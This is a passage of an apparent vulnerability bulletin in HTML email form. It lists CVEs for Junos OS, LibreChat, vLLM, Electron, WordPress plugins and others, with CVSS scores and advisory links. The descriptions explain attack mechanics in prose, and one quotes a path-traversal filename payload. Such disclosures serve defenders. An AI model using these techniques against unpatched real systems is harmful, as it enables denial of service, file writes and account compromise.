to Security Director (SD) cloud, it doesn't perform sufficient verification=
of the received server certificate. This allows a PITM to intercept the co= mmunication between the SRX and SD cloud and access credentials and other s= ensitive information. This issue affects Junos OS: * all versions before 22= .4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7=
, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.=
2 versions before 25.2R1-S2, 25.2R2.</td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33779" target=3D= "_blank" rel=3D"noopener">CVE-2026-33779</a></td>

<a href=3D"https://kb.juniper.net/JSA107823" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107823</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A Missing Release of Memory after Effective Lifetime vulnerability in t= he=C2=A0Layer 2 Address Learning Daemon (l2ald) of Juniper Networks Junos O=
S and Junos OS Evolved allows an adjacent, unauthenticated attacker to caus=
e a memory leak ultimately leading to a Denial of Service (DoS). In an EVPN= -MPLS scenario, routes learned from remote multi-homed Provider Edge (PE) d= evices are programmed as ESI routes. Due to a logic issue in the l2ald memo=
ry management, memory allocated for these routes is not released when there=
is churn for these routes. As a result, memory leaks in the l2ald process = which will ultimately lead to a crash and restart of l2ald. Use the followi=
ng command to monitor the memory consumption by l2ald: user@device&gt; show=
system process extensive | match "PID|l2ald" This issue affects: Junos OS:=
* all versions before 22.4R3-S5, * 23.2 versions before 23.2R2-S3, * 23.4 = versions before 23.4R2-S4, * 24.2 versions before 24.2R2; Junos OS Evolved:=
* all versions before 22.4R3-S5-EVO, * 23.2 versions before 23.2R2-S3-EVO,=
* 23.4 versions before 23.4R2-S4-EVO, * 24.2 versions before 24.2R2-EVO.</=

<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33780" target=3D= "_blank" rel=3D"noopener">CVE-2026-33780</a></td>

<a href=3D"https://kb.juniper.net/JSA107819" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107819</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
n the packet forwarding engine (pfe) of Juniper Networks Junos OS on specif=
ic EX and QFX Series devices allow an unauthenticated, adjacent attacker to=
cause a complete Denial of Service (DoS). On EX4k, and QFX5k platforms con= figured as service-provider edge devices, if L2PT is enabled on the UNI and=
VSTP is enabled on NNI in VXLAN scenarios, receiving VSTP BPDUs on UNI lea=
ds to packet buffer allocation failures, resulting in the device to not pas=
s traffic anymore until it is manually recovered with a restart.This issue = affects Junos OS: * 24.4 releases before 24.4R2, * 25.2 releases before 25.= 2R1-S1, 25.2R2. This issue does not affect Junos OS releases before 24.4R1.= </td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33781" target=3D= "_blank" rel=3D"noopener">CVE-2026-33781</a></td>

<a href=3D"https://kb.juniper.net/JSA107869" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107869</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A Missing Release of Memory after Effective Lifetime vulnerability in t=
he DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series, allows a=
n adjacent, unauthenticated attacker to cause a memory leak, that will even= tually cause a complete Denial-of-Service (DoS). In a DHCPv6 over PPPoE, or= =C2=A0DHCPv6 over VLAN=C2=A0with Active lease query or Bulk lease query sce= nario, every subscriber logout will leak a small amount of memory. When all=
available memory has been exhausted, jdhcpd will crash and restart which c= auses a complete service impact until the process has recovered. The memory=
usage of jdhcpd can be monitored with: user@host&gt; show system processes=
extensive | match jdhcpd This issue affects Junos OS: * all versions befor=
e 22.4R3-S1, * 23.2 versions before 23.2R2, * 23.4 versions before 23.4R2.<=

<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33782" target=3D= "_blank" rel=3D"noopener">CVE-2026-33782</a></td>

<a href=3D"https://kb.juniper.net/JSA107820" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107820</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS Evolved</td>
<td>A Function Call With Incorrect Argument Type vulnerability in the senso=
r interface of Juniper Networks Junos OS Evolved on PTX Series allows a net= work-based, authenticated attacker with low privileges to cause a complete = Denial of Service (DoS). If colored SRTE policy tunnels are provisioned via=
PCEP, and gRPC is used to monitor traffic in these tunnels, evo-aftmand cr= ashes and doesn't restart which leads to a complete and persistent service = impact. The system has to be manually restarted to recover. The issue is se=
en only when the Originator ASN field in PCEP contains a value larger than = 65,535 (32-bit ASN). The issue is not reproducible when SRTE policy tunnels=
are statically configured. This issue affects Junos OS Evolved on PTX Seri= es:=C2=A0 * all versions before 22.4R3-S9-EVO, * 23.2 versions before 23.2R= 2-S6-EVO, * 23.4 versions before 23.4R2-S7-EVO, * 24.2 versions before 24.2= R2-S4-EVO, * 24.4 versions before 24.4R2-S2-EVO, * 25.2 versions before 25.= 2R1-S2-EVO, 25.2R2-EVO.</td>
<td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33783" target=3D= "_blank" rel=3D"noopener">CVE-2026-33783</a></td>

<a href=3D"https://kb.juniper.net/JSA107870" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107870</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An OS Command Injection vulnerability in the CLI processing of Juniper = Networks Junos OS and Junos OS Evolved allows a local, high-privileged atta= cker executing specific, crafted CLI commands to inject arbitrary shell com= mands as root, leading to a complete compromise of the system. Certain 'set=
system' commands, when executed with crafted arguments, are not properly s= anitized, allowing for arbitrary shell injection. These shell commands are = executed as root, potentially allowing for complete control of the vulnerab=
le system. This issue affects: Junos OS:=C2=A0 * all versions before 22.4R3= -S8,=C2=A0 * from 23.2 before 23.2R2-S5,=C2=A0 * from 23.4 before 23.4R2-S7= ,=C2=A0 * from 24.2 before 24.2R2-S2,=C2=A0 * from 24.4 before 24.4R2,=C2=
=A0 * from 25.2 before 25.2R2;=C2=A0 Junos OS Evolved:=C2=A0 * all versions=
before 22.4R3-S8-EVO,=C2=A0 * from 23.2 before 23.2R2-S5-EVO,=C2=A0 * from=
23.4 before 23.4R2-S7-EVO,=C2=A0 * from 24.2 before 24.2R2-S2-EVO,=C2=A0 *=
from 24.4 before 24.4R2-EVO,=C2=A0 * from 25.2 before 25.2R1-S1-EVO, 25.2R= 2-EVO.</td>
<td>2026-04-09</td>
<td>6.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33791" target=3D= "_blank" rel=3D"noopener">CVE-2026-33791</a></td>

<a href=3D"https://kb.juniper.net/JSA107875" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107875</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">danny-avila--LibreChat</td>
<td>LibreChat is a ChatGPT clone with additional features. Prior to 0.8.4, = LibreChat trusts the name field returned by the execute_code sandbox when p= ersisting code-generated artifacts. On deployments using the default local = file strategy, a malicious artifact filename containing traversal sequences=
(for example, ../../../../../app/client/dist/poc.txt) is concatenated into=
the server-side destination path and written with fs.writeFileSync() witho=
ut sanitization. This gives any user who can trigger execute_code an arbitr= ary file write primitive as the LibreChat server user. This vulnerability i=
s fixed in 0.8.4.</td>
<td>2026-04-07</td>
<td>6.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34371" target=3D= "_blank" rel=3D"noopener">CVE-2026-34371</a></td>

<a href=3D"https://github.com/danny-avila/LibreChat/security/advisories/GHS= A-qrm5-r67f-6692" target=3D"_blank" rel=3D"noopener">https://github.com/dan= ny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692</a><br>=C2=A0</t=

</tr>

<td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.4.0 to before 3.4.9, a missing bounds check on the dataWindow attribu=
te in EXR file headers allows an attacker to trigger a signed integer overf= low in generic_unpack(). By setting dataWindow.min.x to a large negative va= lue, OpenEXRCore computes an enormous image width, which is later used in a=
signed integer multiplication that overflows, causing the process to termi= nate with SIGILL via UBSan. This vulnerability is fixed in 3.4.9.</td> <td>2026-04-06</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34378" target=3D= "_blank" rel=3D"noopener">CVE-2026-34378</a></td>

<a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-v76p-4qvv-vh4g" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4q= vv-vh4g</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">vllm-project--vllm</td>
<td>vLLM is an inference and serving engine for large language models (LLMs=
). From 0.7.0 to before 0.19.0, the VideoMediaIO.load_base64() method at vl= lm/multimodal/media/video.py splits video/jpeg data URLs by comma to extrac=
t individual JPEG frames, but does not enforce a frame count limit. The num= _frames parameter (default: 32), which is enforced by the load_bytes() code=
path, is completely bypassed in the video/jpeg base64 path. An attacker ca=
n send a single API request containing thousands of comma-separated base64-= encoded JPEG frames, causing the server to decode all frames into memory an=
d crash with OOM. This vulnerability is fixed in 0.19.0.</td> <td>2026-04-06</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34755" target=3D= "_blank" rel=3D"noopener">CVE-2026-34755</a></td>

<a href=3D"https://github.com/vllm-project/vllm/security/advisories/GHSA-pq= 5c-rjhq-qp7p" target=3D"_blank" rel=3D"noopener">https://github.com/vllm-pr= oject/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">vllm-project--vllm</td>
<td>vLLM is an inference and serving engine for large language models (LLMs=
). From 0.1.0 to before 0.19.0, a Denial of Service vulnerability exists in=
the vLLM OpenAI-compatible API server. Due to the lack of an upper bound v= alidation on the n parameter in the ChatCompletionRequest and CompletionReq= uest Pydantic models, an unauthenticated attacker can send a single HTTP re= quest with an astronomically large n value. This completely blocks the Pyth=
on asyncio event loop and causes immediate Out-Of-Memory crashes by allocat= ing millions of request object copies in the heap before the request even r= eaches the scheduling queue. This vulnerability is fixed in 0.19.0.</td> <td>2026-04-06</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34756" target=3D= "_blank" rel=3D"noopener">CVE-2026-34756</a></td>

<a href=3D"https://github.com/vllm-project/vllm/security/advisories/GHSA-3m= wp-wvh9-7528" target=3D"_blank" rel=3D"noopener">https://github.com/vllm-pr= oject/vllm/security/advisories/GHSA-3mwp-wvh9-7528</a><br><a href=3D"https:= //github.com/vllm-project/vllm/pull/37952" target=3D"_blank" rel=3D"noopene= r">https://github.com/vllm-project/vllm/pull/37952</a><br><a href=3D"https:= //github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7= 380" target=3D"_blank" rel=3D"noopener">https://github.com/vllm-project/vll= m/commit/b111f8a61f100fdca08706f41f29ef3548de7380</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">electron--electron</td>
<td>Electron is a framework for writing cross-platform desktop applications=
using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.= 0-alpha.5, when a renderer calls window.open() with a target name, Electron=
did not correctly scope the named-window lookup to the opener's browsing c= ontext group. A renderer could navigate an existing child window that was o= pened by a different, unrelated renderer if both used the same target name.=
If that existing child was created with more permissive webPreferences (vi=
a setWindowOpenHandler's overrideBrowserWindowOptions), content loaded by t=
he second renderer inherits those permissions. Apps are only affected if th=
ey open multiple top-level windows with differing trust levels and use setW= indowOpenHandler to grant child windows elevated webPreferences such as a p= rivileged preload script. Apps that do not elevate child window privileges,=
or that use a single top-level window, are not affected. Apps that additio= nally grant nodeIntegration: true or sandbox: false to child windows (contr= ary to the security recommendations) may be exposed to arbitrary code execu= tion. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alp= ha.5.</td>
<td>2026-04-07</td>
<td>6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34765" target=3D= "_blank" rel=3D"noopener">CVE-2026-34765</a></td>

<a href=3D"https://github.com/electron/electron/security/advisories/GHSA-f3= pv-wv63-48x8" target=3D"_blank" rel=3D"noopener">https://github.com/electro= n/electron/security/advisories/GHSA-f3pv-wv63-48x8</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">burlingtonbytes--WP Blockade Visual Page Build= er</td>
<td>The WP Blockade plugin for WordPress is vulnerable to Missing Authoriza= tion in all versions up to and including 0.9.14. The plugin registers an ad= min_post action hook 'wp-blockade-shortcode-render' that maps to the render= _shortcode_preview() function. This function lacks any capability check (cu= rrent_user_can()) and nonce verification, allowing any authenticated user t=
o execute arbitrary WordPress shortcodes. The function takes a user-supplie=
d 'shortcode' parameter from $_GET, passes it through stripslashes(), and d= irectly executes it via do_shortcode(). This makes it possible for authenti= cated attackers, with Subscriber-level access and above, to execute arbitra=
ry shortcodes, which could lead to information disclosure, privilege escala= tion, or other impacts depending on what shortcodes are registered on the s= ite (e.g., shortcodes from other plugins that display sensitive data, perfo=
rm actions, or include files).</td>
<td>2026-04-08</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3480" target=3D"= _blank" rel=3D"noopener">CVE-2026-3480</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159a= ac-092b-4655-9d97-a496ac01738c?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092= b-4655-9d97-a496ac01738c?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393" target=3D"_= blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-block= ade/trunk/wp-blockade.php#L393</a><br><a href=3D"https://plugins.trac.wordp= ress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-blocka= de/tags/0.9.14/wp-blockade.php#L393</a><br><a href=3D"https://plugins.trac.= wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-blockad= e/trunk/wp-blockade.php#L361</a><br><a href=3D"https://plugins.trac.wordpre= ss.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361" target=3D"_bla= nk" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-blockade= /tags/0.9.14/wp-blockade.php#L361</a><br><a href=3D"https://plugins.trac.wo= rdpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112" target=3D"_blan=
k" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/= trunk/wp-blockade.php#L112</a><br><a href=3D"https://plugins.trac.wordpress= .org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112" target=3D"_blank=
" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/t= ags/0.9.14/wp-blockade.php#L112</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">David Lingren--Media LIbrary Assistant</td> <td>Improper Neutralization of Input During Web Page Generation ('Cross-sit=
e Scripting') vulnerability in David Lingren Media LIbrary Assistant allows=
Stored XSS.This issue affects Media LIbrary Assistant: from n/a through 3.= 34.</td>
<td>2026-04-06</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34897" target=3D= "_blank" rel=3D"noopener">CVE-2026-34897</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/media-library-a= ssistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-= site-scripting-xss-vulnerability?_s_id=3Dcve" target=3D"_blank" rel=3D"noop= ener">https://patchstack.com/database/wordpress/plugin/media-library-assist= ant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-= scripting-xss-vulnerability?_s_id=3Dcve</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--mirror registry for Red Hat OpenShift= </td>
<td>A flaw was found in the OpenShift Mirror Registry. This vulnerability a= llows an unauthenticated, remote attacker to enumerate valid usernames and = email addresses via different error messages during authentication failures=
and account creation.</td>
<td>2026-04-08</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14243" target=3D= "_blank" rel=3D"noopener">CVE-2025-14243</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-14243" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-1= 4243</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D241982=
9" target=3D"_blank" rel=3D"noopener">RHBZ#2419829</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">inisev--BackupBliss Backup &amp; Migration wit=
h Free Cloud Storage</td>
<td>The Backup Migration plugin for WordPress is vulnerable to Missing Auth= orization in all versions up to, and including, 2.0.0. This is due to a mis= sing capability check on the 'initializeOfflineAjax' function and lack of p= roper nonce verification. The endpoint only validates against hardcoded tok= ens which are publicly exposed in the plugin's JavaScript. This makes it po= ssible for unauthenticated attackers to trigger the backup upload queue pro= cessing, potentially causing unexpected backup transfers to configured clou=
d storage targets and resource exhaustion.</td>
<td>2026-04-07</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14944" target=3D= "_blank" rel=3D"noopener">CVE-2025-14944</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a= 15-0743-48cc-8c92-7cb839fa5847?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-074= 3-48cc-8c92-7cb839fa5847?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29" targe= t=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/ba= ckup-backup/trunk/includes/offline.php#L29</a><br><a href=3D"https://plugin= s.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#= L112" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org= /browser/backup-backup/trunk/includes/ajax_offline.php#L112</a><br><a href= =3D"https://plugins.trac.wordpress.org/changeset?old=3D3386897&old_path=3Db= ackup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3D3449635&new_path= =3Dbackup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php" target=3D"_blank"=
rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?old=3D338689= 7&old_path=3Dbackup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3D34= 49635&new_path=3Dbackup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php</a><= br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">johanaarstein--AM LottiePlayer</td>
<td>The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-= Site Scripting via uploaded SVG files in all versions up to, and including,=
3.6.0 due to insufficient input sanitization and output escaping. This mak=
es it possible for authenticated attackers, with Author-level access and ab= ove, to inject arbitrary web scripts in pages that will execute whenever a = user accesses an injected page.</td>
<td>2026-04-08</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-1794" target=3D"= _blank" rel=3D"noopener">CVE-2025-1794</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1a= d1-1e2e-4b56-b16c-d87956b142ad?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2= e-4b56-b16c-d87956b142ad?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnai= l.php" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.or= g/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Hitachi--JP1/IT Desktop Management 2 - Manager= </td>
<td>Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager =
on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, J=
ob Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/I=
T Desktop Management - Manager on Windows, Job Management Partner 1/IT Desk= top Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NE= TM/DM Client on Windows, Job Management Partner 1/Software Distribution Man= ager on Windows, Job Management Partner 1/Software Distribution Client on W= indows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50=
before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, f= rom 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12= -60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operatio=
ns Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 1= 3-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-0=
5, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management = Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; J= P1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Manage= ment Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16=
; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: fro=
m 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Ma= nager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distr= ibution Client: from 09-00 through 09-51-13.</td>
<td>2026-04-07</td>
<td>5.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-65116" target=3D= "_blank" rel=3D"noopener">CVE-2025-65116</a></td>

<a href=3D"https://www.hitachi.com/products/it/software/security/info/vuls/= hitachi-sec-2026-118/index.html" target=3D"_blank" rel=3D"noopener">https:/= /www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-1= 18/index.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">vsourz1td--Advanced Contact form 7 DB</td>
<td>The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Cr= oss-Site Request Forgery in all versions up to, and including, 2.0.9. This =
is due to missing or incorrect nonce validation on the 'vsz_cf7_save_settin= g_callback' function. This makes it possible for unauthenticated attackers =
to delete form entry via a forged request granted they can trick a site adm= inistrator into performing an action such as clicking on a link.</td> <td>2026-04-08</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-0811" target=3D"= _blank" rel=3D"noopener">CVE-2026-0811</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/880977= 44-d2f5-4ae5-aa71-0f4a0decd911?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f= 5-4ae5-aa71-0f4a0decd911?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7= -db-admin.php#L885" target=3D"_blank" rel=3D"noopener">https://plugins.trac= .wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-= db-admin.php#L885</a><br><a href=3D"https://plugins.trac.wordpress.org/chan= geset/3497481/advanced-cf7-db" target=3D"_blank" rel=3D"noopener">https://p= lugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db</a><br>=C2=A0</=

</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab EE affecting all versions from=
18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in=
Code Quality reports could have allowed an authenticated user to leak IP a= ddresses of users viewing the report via specially crafted content.</td> <td>2026-04-08</td>
<td>5.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1516" target=3D"= _blank" rel=3D"noopener">CVE-2026-1516</a></td>

<a href=3D"https://hackerone.com/reports/3514461" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3514461</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/587893" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/587893</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">wpmudev--Hustle Email Marketing, Lead Generati= on, Optins, Popups</td>
<td>The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin fo=
r WordPress is vulnerable to unauthorized modification of data due to a mis= sing capability check on the 'hustle_module_converted' AJAX action in all v= ersions up to, and including, 7.8.10.2. This makes it possible for unauthen= ticated attackers to forge conversion tracking events for any Hustle module=
, including draft modules that are never displayed to users, thereby manipu= lating marketing analytics and conversion statistics.</td>
<td>2026-04-07</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2263" target=3D"= _blank" rel=3D"noopener">CVE-2026-2263</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/230546= 2c-0a00-4423-8dc2-e32628c4864d?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a0= 0-4423-8dc2-e32628c4864d?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-modul= e-front-ajax.php#L32" target=3D"_blank" rel=3D"noopener">https://plugins.tr= ac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-modu= le-front-ajax.php#L32</a><br><a href=3D"https://plugins.trac.wordpress.org/= browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php= #L1047" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.o= rg/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.= php#L1047</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/word= press-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311" target=3D"= _blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wordpre= ss-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311</a><br><a href= =3D"https://plugins.trac.wordpress.org/changeset?old_path=3D/wordpress-popu= p/tags/7.8.10.2&new_path=3D/wordpress-popup/tags/7.8.11" target=3D"_blank" = rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?old_path=3D/w= ordpress-popup/tags/7.8.10.2&new_path=3D/wordpress-popup/tags/7.8.11</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">OCS Inventory--OCS Inventory NG Server</td> <td>OCS Inventory NG Server version 2.12.3 and prior contain a stored cross= -site scripting vulnerability that allows unauthenticated attackers to exec= ute arbitrary JavaScript by submitting malicious User-Agent HTTP headers to=
the /ocsinventory endpoint. Attackers can register rogue agents or craft r= equests with malicious User-Agent values that are stored without sanitation=
and rendered with insufficient encoding in the web console, leading to arb= itrary JavaScript execution in the browsers of authenticated users viewing = the statistics dashboard.</td>
<td>2026-04-06</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22675" target=3D= "_blank" rel=3D"noopener">CVE-2026-22675</a></td>

<a href=3D"https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483"=
target=3D"_blank" rel=3D"noopener">https://github.com/OCSInventory-NG/OCSI= nventory-Server/pull/483</a><br><a href=3D"https://github.com/OCSInventory-= NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e" tar= get=3D"_blank" rel=3D"noopener">https://github.com/OCSInventory-NG/OCSInven= tory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e</a><br><a href= =3D"https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss= -via-user-agent" target=3D"_blank" rel=3D"noopener">https://www.vulncheck.c= om/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Volcengine--OpenViking</td>
<td>OpenViking versions prior to 0.3.3 contain a missing authorization vuln= erability in the task polling endpoints that allows unauthorized attackers =
to enumerate or retrieve background task metadata created by other users. A= ttackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes wi= thout authentication to expose task type, task status, resource identifiers=
, archive URIs, result payloads, and error information, potentially causing=
cross-tenant interference in multi-tenant deployments.</td> <td>2026-04-07</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22680" target=3D= "_blank" rel=3D"noopener">CVE-2026-22680</a></td>

